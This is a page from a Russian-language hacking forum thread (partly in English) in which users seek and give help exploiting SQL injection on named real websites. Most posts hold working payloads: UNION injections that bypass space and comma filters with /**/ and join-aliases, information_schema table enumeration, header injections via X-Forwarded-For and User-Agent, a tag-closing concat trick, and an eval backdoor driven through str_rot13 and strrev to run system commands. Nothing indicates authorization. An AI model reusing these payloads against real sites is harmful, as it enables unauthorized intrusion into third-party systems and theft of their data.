Старый 19.02.2013, 18:38   #2731
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
В качестве бэкдора был оставлен eval. Теперь, когда он понадобился, не могу нормально сработать.
Работает:
Код:
system(ls);
system(base64_decode(J2xzJwoK));
Если кавычки ставлю без base64 - не работает
Код:
system('ls');
Похоже, что это фильтр на входные данные рубит.
Код:
eval(str_rot13($_REQUEST[command]))
?command=ez+-es+.
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 19.02.2013, 23:06   #2732
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Попалась совсем непонятная SQL в DLE движке в поиске:
http://oboiki.net/photo/search
POST: search=11111111'
Крутил по всякому, насколько я понял там вообще куча всего режется и заменяется непонятным образом, я при раскрутке ориентировался на запрос, который скрипт поставляет в поле memo, там совершенно что то непонятное происходит, при попытке вывести данные в ошибку, часть запроса отрезается, или вообще модифицируется, ну допустим пробелы если заменять на /**/ они перестают "исчезать", а вот как с запятыми быть, да и другие спец-символы как то странно модифицируются.
В общем если кто сможет раскрутить, будет просто любопытно как это у кого получится.
Спасибо.
netcat вне форума   Ответить с цитированием
Старый 20.02.2013, 12:20   #2733
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от netcat Посмотреть сообщение
Попалась совсем непонятная SQL в DLE движке в поиске:
http://oboiki.net/photo/search
POST: search=11111111'
Крутил по всякому, насколько я понял там вообще куча всего режется и заменяется непонятным образом, я при раскрутке ориентировался на запрос, который скрипт поставляет в поле memo, там совершенно что то непонятное происходит, при попытке вывести данные в ошибку, часть запроса отрезается, или вообще модифицируется, ну допустим пробелы если заменять на /**/ они перестают "исчезать", а вот как с запятыми быть, да и другие спец-символы как то странно модифицируются.
В общем если кто сможет раскрутить, будет просто любопытно как это у кого получится.
Спасибо.
as you can see,the injection is into ('%injection%'),so first,we need to close the injection.
Код:
')injection%23
now,when we try to inject,we are notice that we are not allowed to use space and commans. so,we can count the columns like that-
Код:
')group/**/by(26)%23
we found 25 columns,so the injection goes like that-
Код:
search=11111')union/**/select*from(select'1')`a`join(select'2')`b`join(select'3')`c`join(select'5')`d`join(select'6')`e`join(select'7')`f`join(select'8')`g`join(select'9')`h`join(select'10')`i`join(select'11')`j`join(select'12')`k`join(select'13')`l`join(select'14')`m`join(select'15')`n`join(select'16')`o`join(select'17')`p`join(select'18')`q`join(select'19')`r`join(select'20')`s`join(select'21')`t`join(select'22')`u`join(select'23')`v`join(select'24')`w`join(select'25')`x`join(select'26')`y`%23a
since we cannot use commas,we can use
Код:
union select * from (select 1)a join (select 2)b
instead of
Код:
union select 1,2
the `letter` is for the alias,and whitespace bypass.
the %23 is # encoded,which means end of the line.
column #2 is our columns,so
(select(version()))`b`
5.5.22

Цитата:
Сообщение от d0znpp Посмотреть сообщение
Похоже, что это фильтр на входные данные рубит.
Код:
eval(str_rot13($_REQUEST[command]))
?command=ez+-es+.
haha nice
you can also use reverse function-
system(strrev('al -sl'))
system(strrev(di))
spari вне форума   Ответить с цитированием
Старый 20.02.2013, 20:49   #2734
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от spari Посмотреть сообщение
as you can see,the injection is into ('%injection%'),so first,we need to close the injection.
Код:
')injection%23
now,when we try to inject,we are notice that we are not allowed to use space and commans. so,we can count the columns like that-
Код:
')group/**/by(26)%23
we found 25 columns,so the injection goes like that-
Код:
search=11111')union/**/select*from(select'1')`a`join(select'2')`b`join(select'3')`c`join(select'5')`d`join(select'6')`e`join(select'7')`f`join(select'8')`g`join(select'9')`h`join(select'10')`i`join(select'11')`j`join(select'12')`k`join(select'13')`l`join(select'14')`m`join(select'15')`n`join(select'16')`o`join(select'17')`p`join(select'18')`q`join(select'19')`r`join(select'20')`s`join(select'21')`t`join(select'22')`u`join(select'23')`v`join(select'24')`w`join(select'25')`x`join(select'26')`y`%23a
since we cannot use commas,we can use
Код:
union select * from (select 1)a join (select 2)b
instead of
Код:
union select 1,2
the `letter` is for the alias,and whitespace bypass.
the %23 is # encoded,which means end of the line.
column #2 is our columns,so
(select(version()))`b`
5.5.22
Как таблицы через лимит перебирать не пойму?


search=11111')union/**/select*from(select'1')`a`join(select(table_name)fr om(information_schema.tables))`b`join(select'3')`c `join(select'5')`d`join(select'6')`e`join(select'7 ')`f`join(select'8')`g`join(select'9')`h`join(sele ct'10')`i`join(select'11')`j`join(select'12')`k`jo in(select'13')`l`join(select'14')`m`join(select'15 ')`n`join(select'16')`o`join(select'17')`p`join(se lect'18')`q`join(select'19')`r`join(select'20')`s` join(select'21')`t`join(select'22')`u`join(select' 23')`v`join(select'24')`w`join(select'25')`x`join( select'26')`y`%23a");

не проходит так


search=11111')union/**/select*from(select'1')`a`join(select(table_name)fr om(information_schema.tables)limit/**/0,1)`b`join(select'3')`c`join(select'5')`d`join(se lect'6')`e`join(select'7')`f`join(select'8')`g`joi n(select'9')`h`join(select'10')`i`join(select'11') `j`join(select'12')`k`join(select'13')`l`join(sele ct'14')`m`join(select'15')`n`join(select'16')`o`jo in(select'17')`p`join(select'18')`q`join(select'19 ')`r`join(select'20')`s`join(select'21')`t`join(se lect'22')`u`join(select'23')`v`join(select'24')`w` join(select'25')`x`join(select'26')`y`%23a");
Flakt вне форума   Ответить с цитированием
Старый 20.02.2013, 22:22   #2735
Сергей Бардюр
 
Регистрация: 27.09.2012
Сообщений: 10
Репутация: 0
По умолчанию

Здравствуйте друзья, сейчас очень нужна ваша помощь в раскрутки двух нужных мне порталов, своих знаний увы не хватает.
Первый ребус:
Код:
http://colombiareports.com/
Шлем заголовок: X-Forwarded-For: 1.2.3.4'
В возможности её раскрутки крайне не уверен, но если кто мне поможет с этим сайтом, будет просто счастье, так как сайт очень нужен мне.
Тут фильтр, который по всей видимости палит "неправильный" IP адрес, и вообще режет переменную, оставляя её пустой, а SQL запрос получает вид: ip_address=, - неправильный синтаксис, о чем он и сообщает в ошибке, и понятно, что там должно по идее находиться, но пустует.

Ребус второй:
Код:
http://www.stylist-prof.ru/
Шлем заголовок: User-Agent:  opera'
Сайт загружается как обычно, по началу всё нормально, но когда он полностью загрузится, он выведет на экран обычный яваскрипт alert(); в котором будет MySQL ошибка на синтаксис:
Код:
BEGIN JsHttpRequest
Тут дальше полный SQL запрос с обычной мускуловой ошибкой.
Проблема в том, что я не могу дотянуться напрямую до этого как я понимаю аяксового модуля «JsHttpRequest» куда он эти запросы отправляет, чтобы работать с ним напрямую, знаний расковырять всё это хозяйство не хватает.
Тогда я просто начал пытаться раскрутить SQL в ошибку, чтобы он мне результаты выдавал в этот алерт, но не получается, где то ругается на неправильность запроса, так я раскрутить не смог.

Буду очень и очень признателен, если кто то поможет хоть с одним сайтом.
Спасибо за внимание.
Сергей Бардюр вне форума   Ответить с цитированием
Старый 20.02.2013, 22:32   #2736
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

you dont have to sort anything,you can see all the tables in the pictures.

using this subquery:
Код:
(select(table_name)from(information_schema.tables)where(table_schema<>'information_schema'))
in our query-
Код:
search=11111')union/**/select*from(select'1')`a`join(select(table_name)from(information_schema.tables)where(table_schema<>'information_schema'))`b`join(select'3')`c`join(select'5')`d`join(select'6')`e`join(select'7')`f`join(select'8')`g`join(select'9')`h`join(select'10')`i`join(select'11')`j`join(select'12')`k`join(select'13')`l`join(select'14')`m`join(select'15')`n`join(select'16')`o`join(select'17')`p`join(select'18')`q`join(select'19')`r`join(select'20')`s`join(select'21')`t`join(select'22')`u`join(select'23')`v`join(select'24')`w`join(select'25')`x`join(select'26')`y`%23a
and the other tables:
Код:
(select(table_name)from(information_schema.tables)where(table_schema<>'information_schema')and(table_name>'lasttable'))
in our query-
Код:
search=11111')union/**/select*from(select'1')`a`join(select(table_name)from(information_schema.tables)where(table_schema<>'information_schema')and(table_name>'dle_post_log'))`b`join(select'3')`c`join(select'5')`d`join(select'6')`e`join(select'7')`f`join(select'8')`g`join(select'9')`h`join(select'10')`i`join(select'11')`j`join(select'12')`k`join(select'13')`l`join(select'14')`m`join(select'15')`n`join(select'16')`o`join(select'17')`p`join(select'18')`q`join(select'19')`r`join(select'20')`s`join(select'21')`t`join(select'22')`u`join(select'23')`v`join(select'24')`w`join(select'25')`x`join(select'26')`y`%23a
and you can see all the tables without using group_concat() or limit.
spari вне форума   Ответить с цитированием
Старый 24.02.2013, 08:41   #2737
_xhugo
 
Регистрация: 11.11.2010
Сообщений: 26
Репутация: 0
По умолчанию

как узнать префикс пароля в булке?
предполагал prefix_users, но нет..
смотрю здесь _alex-dsa.net/skripty/vbulletin/isxodnaya-struktura-bd-vbulletin.html структуру, такая же и на сервере
_xhugo вне форума   Ответить с цитированием
Старый 28.02.2013, 16:20   #2738
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

такая проблема , у меня вывод скули в сорцы

<meta name="description" content="5.1.61-cll" />

как-то можно закрыть тег в запросе чтобы вывод был на морду?
Как в этом примере:

http://www.1md.ru/catalog/list/(251-1)and(1=2)union(select(1),concat(0x3c2f7469746c653 e3c68313e,version(),0x3c2f68313e),3,4,5,7))

https://rdot.org/forum/showpost.php?p=30157&postcount=2774
Flakt вне форума   Ответить с цитированием
Старый 28.02.2013, 16:27   #2739
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

sure.
close the tag first,and then ignore the rest. just like string in sqli
concat(0x222f3e,version(),0x3c212d2d)
spari вне форума   Ответить с цитированием
Старый 01.03.2013, 23:25   #2740
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Помогите раскрутить SQL:
http://news.qs.kiev.ua/lenta/s.php?s=%27
Тут режутся почти все спец символы, скобки, запятые, и так далее, вариантов раскрутки нету, но возможно кто то сможет решить.
netcat вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot